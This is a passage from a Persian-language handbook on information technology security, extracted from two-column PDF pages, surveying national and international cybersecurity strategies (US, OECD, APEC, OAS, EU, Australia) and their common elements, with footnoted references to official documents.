‫ﻛﻠﻴﻨﺘﻮﻥ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ "ﺗﺼﻤﻴﻤﺎﺕ ﺭﺍﻫﺒـﺮﺩﻱ ﺭﺋـﻴﺲ ﺟﻤﻬـﻮﺭ" )‪ (PDD‬ﻣﻨﺘـﺸﺮ‬ ‫‪۳۶‬‬
‫‪2001,‬‬ ‫ﻛﺮﺩ‪:‬‬
‫‪http://www.kantei.go.jp/foreign/it/network/priori‬‬ ‫‪63: Critical Infrastructure Protection, May 22,‬‬
‫‪ty-all/index.html‬‬ ‫‪1998,‬‬
‫ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺁﻥ ﻋﺒﺎﺭﺗﺴﺖ ﺍﺯ‬ ‫‪۳۹‬‬ ‫‪http://www.fas.org/irp/offdocs/pdd-63.htm‬‬
‫‪The National Strategy to Secure Cyberspace:‬‬ ‫‪62: Protection Against Unconventional‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬ ‫‪Threats to the Homeland & Americans‬‬
‫‪nal_Cyberspace_Strategy.pdf.‬‬ ‫‪Overseas, May 22, 1998,‬‬
‫‪http://www.fas.org/irp/offdocs/pdd-62.htm‬‬
‫ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺎ ﻛﻤﻚ ﺍﺯ ﺳﻨﺪ ﺯﻳﺮ ﺗﻬﻴﻪ ﺷﺪ‪:‬‬
‫ﺑﻌﺪ ﺍﺯ ‪ ۱۱‬ﺳﭙﺘﺎﻣﺒﺮ ‪ ۲۰۰۱‬ﻧﻴﺰ ﺑﻮﺵ ﺩﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺍﺟﺮﺍﻳﻲ ﺍﻣﻀﺎ ﻛﺮﺩ‬
‫‪The National Strategy for Physical Protection‬‬
‫‪of Critical Infrastructures & Key Assets:‬‬ ‫ﻛﻪ ﻃﺒﻖ ﺁﻧﻬـﺎ ﻋﻤﻠﻴـﺎﺕ ﻣﺠـﺪﺩﹰﺍ ﻣﻜﺎﻧﻴـﺎﺑﻲ ﻣـﻲﺷـﺪ ﻭ ﻣﻮﺟﻮﺩﻳﺘﻬـﺎﻱ‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Phys‬‬ ‫ﺟﺪﻳﺪﻱ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‬
‫‪ical-Strategy.pdf.‬‬
‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪ‪:‬‬
‫ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺍﺟﺰﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺭﺍ ﺷﺮﺡ ﻣـﻲﺩﻫﻨـﺪ ﻭ‬
‫‪E.O. 13228, Establishing the Office of‬‬
‫ﺩﺭ ﺟﻮﻻﻱ ‪ ۲۰۰۲‬ﺗﻮﺳﻂ ﻛﺎﺥ ﺳﻔﻴﺪ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ‪.‬‬ ‫‪Homeland Security & the Homeland Security‬‬
‫‪٢٣٩‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺁﻣﺮﻳﻜﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺳﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺑﺮﭘﺎ ﮔﺸﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻧﺸـﺴﺘﻬﺎ‬
‫ﺷﺒﻜﻪﻫﺎ ﺗﺪﻭﻳﻦ ﻧﻤﻮﺩ‪ ٤٦.‬ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ‬ ‫ﮔﺮﻭﻩ ﻫﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ‪ -‬ﻣﺪﻧﻲ‪ ،‬ﻫﻤﻜﺎﺭﺍﻥ ﺗﺠﺎﺭﻱ‪ ،‬ﻭ ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ‬
‫)‪ ٤٧(OECD‬ﻧﻴﺰ ﺧـﻂﻣـﺸﻲﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬ ‫ﻳﻜﺪﻳﮕﺮ ﻣﺸﻮﺭﺕ ﻛﺮﺩﻧﺪ‪ .‬ﺍﺯ ﺩﻳﮕﺮ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫‪٣٩‬‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺧﺼﻮﺹ ﺗﻬﻴﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻣﻨﺘـﺸﺮ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫‪٤٨‬‬
‫ﺳﺎﺧﺖ‪.‬‬ ‫ﺩﺭ ﺳﻄﺢ ﻣﻨﻄﻘﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎ ﻓﻌﺎﻟﻴﺘﻬـﺎﻳﻲ‬
‫ﺑﻌﺪ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﺗﻼﺷﻬﺎ‪ ،‬ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻣﻮﺿـﻮﻋﻲ ﻫﻤﺎﻫﻨـﮓ ﻭ‬ ‫ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺧﻮﺩ‬
‫ﻳﻜﭙﺎﺭﭼــﻪ ﺍﺯ ﺍﺳــﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺩﺭ ﺳــﻄﻮﺡ ﻣﻠــﻲ‪،‬‬ ‫ﺭﺍ ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻳﻚ ﺳﻨﺪ ﻭﺍﺣﺪ‪ ،‬ﺑﻠﻜﻪ ﻃﻲ ﭼﻨـﺪﻳﻦ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ‬
‫ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬ ‫ﺳﻠﺴﻠﻪ ﺍﺳﻨﺎﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ‬
‫‪٤١‬‬ ‫‪٤٠‬‬
‫ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ‪ .‬ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺁﺳـﻴﺎ)‪(APEC‬‬
‫ﻣﺸﺎﺭﻛﺖ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ‬ ‫•‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ ﻛـﺎﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﺑﺨـﺸﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ ﺩﻭﺭ )‪ ٤٢(TEL‬ﻭ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﻓﻌـﺎﻝ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ ٤٩.‬ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺻـﻠﻲ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ ٤٣.‬ﺳﺎﺯﻣﺎﻥ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ‬
‫ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜﺎ )‪ ٤٤(OAS‬ﻣﺴﺌﻮﻟﻴﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﺭﺍ ﻧﻴﺰ‬
‫ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫ﺑــﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﺩ‪ ٤٥.‬ﺩﺭ ﮊﻭﺋــﻦ ‪ ۲۰۰۳‬ﻣﺠﻤــﻊ ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ‬
‫ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ‬ ‫•‬ ‫ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜـﺎ ﻗﻄﻌﻨﺎﻣـﻪﺍﻱ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺩﺍﺧﻠـﻲ‬
‫"ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪﮔﺎﻥ ﺍﺯ ﺷــﺒﻜﻪ ﺍﺯ ﺟﻤﻠــﻪ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﮔﺎﻥ‪،‬‬
‫ﺭﺍﻫﺒﺮﺍﻥ‪ ،‬ﺍﭘﺮﺍﺗﻮﺭﻫﺎ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ‬ ‫‪39‬‬ ‫‪E-Security National Agenda [Australia],‬‬
‫‪September 2001,‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻭﺍﺭﺩﻩ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻭ‬ ‫‪http://www.noie.gov.au/projects/confidence/Pr‬‬
‫‪otecting/nat_agenda.htm‬‬
‫‪40‬‬ ‫‪European Commission, Proposal for a‬‬
‫‪46‬‬ ‫‪Development of an Inter-American Strategy to‬‬ ‫‪Regulation of the European Parliament & of‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫‪Combat Threats to Cybersecurity, AG/RES.‬‬ ‫‪the Council - Establishing the European‬‬


‫)‪1939 (XXXIII-0/03‬‬ ‫‪Network & Information Security Agency, Feb.‬‬
‫ﻗﻄﻌﻨﺎﻣﻪ ﺩﺭ ﺟﻠﺴﻪ ﭼﻬﺎﺭﻡ ﺩﺭ ‪ ۱۰‬ﮊﻭﺋﻦ ‪ ۲۰۰۳‬ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﻴﺪ‪.‬‬ ‫‪11, 2003, COM (2003) 63 Final, 2003/0032‬‬
‫‪(COD),‬‬
‫‪47‬‬ ‫‪Organization for Eonomic Cooperation and‬‬ ‫‪http://europa.eu.int/information_society/eeuro‬‬
‫‪Development‬‬ ‫‪pe/action_plan/safe/documents/nisa_en.pdf‬‬
‫‪48‬‬ ‫& ‪Organization for Economic Cooperation‬‬ ‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬
‫‪Development, OECD Guidelines for the‬‬
‫‪Security of Information Systems & Networks:‬‬ ‫ﻛﻨﻴﺪ‪ .‬ﻧﺴﺨﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
‫‪Towards a Culture of Security, July 25, 2002,‬‬ ‫ﺍﺳﺖ‪:‬‬
‫‪http://www.oecd.org/pdf/M00034000/M000340‬‬ ‫‪http://www.infodev-security.net/handbook‬‬
‫‪00.pdf‬‬ ‫‪41‬‬ ‫‪Asia Pacific Economic Cooperation‬‬
‫‪Implementation Plans for the OECD‬‬ ‫‪42‬‬ ‫‪Telecommunications and Information Working‬‬
‫‪Guidelines for the Security of Information‬‬ ‫‪Group‬‬
‫‪Systems & Networks: Towards a Culture of‬‬
‫‪Security, Organization for Economic‬‬
‫ﺍﻳﻦ ﺳﻨﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪:‬‬ ‫‪۴۳‬‬
‫‪Cooperation & Development, Working Party‬‬ ‫‪http://www.apecsec.org.sg/content/apec/apec‬‬
‫‪on Information Security & Privacy,‬‬ ‫‪_groups/working_groups/telecommunications‬‬
‫‪DSTI/ICCP/REG(2002)6‬‬ ‫‪_and_information.html‬‬
‫‪/FINAL, Jan. 21, 2003,‬‬ ‫ﺩﺭ ﺍﻛﺘﺒــﺮ ‪ ،۲۰۰۲‬ﻭﺯﻳــﺮﺍﻥ ‪ APEC‬ﺍﻫﻤﻴــﺖ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻳﻜﭙــﺎﺭﭼﮕﻲ‬
‫‪http://www.olis.oecd.org/olis/2002doc.nsf/Link‬‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ‪ APEC‬ﺭﺍ ﺩﺭ ﻋـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪To/dsti-iccp-reg(2002)6-final‬‬
‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﺋﻴﺎﺕ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ‪:‬‬ ‫‪۴۹‬‬ ‫ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻨﺪ‪ .‬ﺩﺭ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‪ ،‬ﺁﻧـﺎﻥ ﺍﺯ‬
‫‪APEC, "Statement on the Security of‬‬ ‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ‪ TEL‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻭ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺳـﺘﻮﺭ‬
‫"‪Information & Communications Infrastructure,‬‬ ‫ﺩﺍﺩﻧﺪ ﻛﻪ ﺁﻧﺮﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ‪:‬‬
‫‪Fifth‬‬ ‫‪APEC‬‬ ‫‪Ministerial‬‬ ‫‪Meeting‬‬ ‫‪on‬‬ ‫‪http://203.127.220.67/apec/ministerial_statem‬‬
‫‪Telecommunications‬‬ ‫‪ans‬‬ ‫‪Information‬‬ ‫‪ents/annual_ministerial/2002_14th_apec_mini‬‬
‫‪Industry,Shanghai, China, May 29-30, 2002,‬‬ ‫‪sterial.html#policies‬‬
‫‪http://www.apecsec.org.sg/virtualib/minismtg/t‬‬ ‫‪44 Organization of American States‬‬
‫‪elminAnnexB_SICT.html‬‬ ‫ﻭﻇﻴﻔﻪ ﺍﻭﻟﻴﻪ ‪ OAS‬ﺟﻨﺎﻳﺎﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ‬ ‫‪۴۵‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﻛﻨﻴﺪ‪ .‬ﻧﺴﺨﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬ ‫‪http://www.oas.org/juridico/english/cyber_exp‬‬
‫‪http://www.infodev-security.net/handbook.‬‬ ‫‪erts.htm‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٤٠‬‬

‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﻭ ﺟـﺮﺍﺋﻢ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺁﻣـﻮﺯﺵ‬ ‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻭ ﻧﻘﺶ‬
‫‪٥٠‬‬
‫ﺩﻫﻨﺪ‪".‬‬ ‫ﺧﻮﺩ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ‪".‬‬
‫‪٥٢‬‬
‫ﺍﻫﻤﻴﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬ ‫•‬ ‫ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬ ‫•‬
‫ﺷﺒﻜﻪﻫﺎﻱ ‪ ICT‬ﺩﺍﺩﻩﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺣـﺴﺎﺱ ﺷﺨـﺼﻲ ﺭﺍ‬ ‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺗﻌﺪﺍﺩ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬
‫ﺍﻧﺘﻘﺎﻝ ﻣﻲ ﺩﻫﻨﺪ ﻭ ﺫﺧﻴﺮﻩ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺟﺰﺀ‬ ‫ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺑـﺼﻮﺭﺕ ﺩﺍﻭﻃﻠﺒﺎﻧـﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺿﺮﻭﺭﻱ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ﻭ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ‬ ‫ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺗﻬﻴﻪ ﺷﻮﺩ ﻭ ﺗﺠﺮﺑﻴﺎﺕ ﺍﺯ ﻃﺮﻳـﻖ ﻣﺆﺳـﺴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ﺍﺭﺯﺷﻬﺎﻱ‬ ‫ﻣﺸﺎﻭﺭ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺗﻮﺳـﻌﻪ ﻳﺎﺑـﺪ‪.‬‬
‫‪٥٣‬‬
‫ﻣﻬﻢ ﺟﺎﻣﻌﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ‪.‬‬ ‫ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍﻫﻨﻤﺎﻱ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﺍﺧﻠﻲ‬
‫ﺩﻭﻟﺖ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻭﻟﺖ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‪ ،‬ﻫﺸﺪﺍﺭ ﻭ ﻋﻜﺲﺍﻟﻌﻤﻞ‬ ‫•‬ ‫‪٥١‬‬
‫ﻓﻨﻲ ﺑﺮﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫ﺁﺳﻴﺎ ﺍﺑﺮﺍﺯ ﺩﺍﺷﺖ‪" :‬ﻣﺒﺎﺭﺯﺓ ﻣﺆﺛﺮ ﺑﺎ ﺗﺨﻠﻔﺎﺕ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬ ‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ‬ ‫•‬
‫ﻭ ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺍﻃﻼﻋـــﺎﺕ ﺯﻳﺮﺳـــﺎﺧﺘﻲ‪ ،‬ﻭﺍﺑـــﺴﺘﻪ ﺑـــﻪ‬ ‫ﻼ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬ ‫ﻛﺎﻣ ﹰ‬
‫ﺍﻗﺘــﺼﺎﺩﻫﺎﻳﻲ ﺍﺳــﺖ ﻛــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ‬ ‫ﺑﺎ ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺣﻤـﻼﺕ‬
‫ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﺩﺍﺭﻧـﺪ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺭﺍ‬ ‫ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳـﺪ‬
‫ﺻﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ‬ ‫ﺗﺸﻮﻳﻖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳـﺎﻳﺮ‬
‫ﻳﻚ ﺗﻬﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺷـﻮﺩ‪،‬‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ‪ ،‬ﺑﺎ ﺩﻭﻟﺖ‪ ،‬ﻭ ﻧﻴﺰ ﺑﺎ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ‬
‫ﺷﺒﻜﻪﻫﺎ ﺑﻬﺘﺮ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ‪ ٥٤".‬ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ‬ ‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬
‫ﻣﺘﺤﺪﻩ ﺍﺯ ﻋﻤﻮﻡ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﺧﻮﺍﺳﺘﻪ ﺑﻮﺩ ﺩﺭ ﺍﻳﺠﺎﺩ ﻳـﻚ‬
‫ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ‬ ‫•‬
‫ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﭘﺎﺳﺨﮕﻮﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷـﺪ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺁﺳـﻴﺎ )‪(APEC‬‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﺭﺩ ﺑﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻣﻲﮔﻮﻳﺪ‪" :‬ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺑـﺮﺍﻱ ﺑـﻪ ﺛﻤـﺮ ﺭﺳـﻴﺪﻥ‬
‫ﺑﺴﺮﻋﺖ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ‪.‬‬
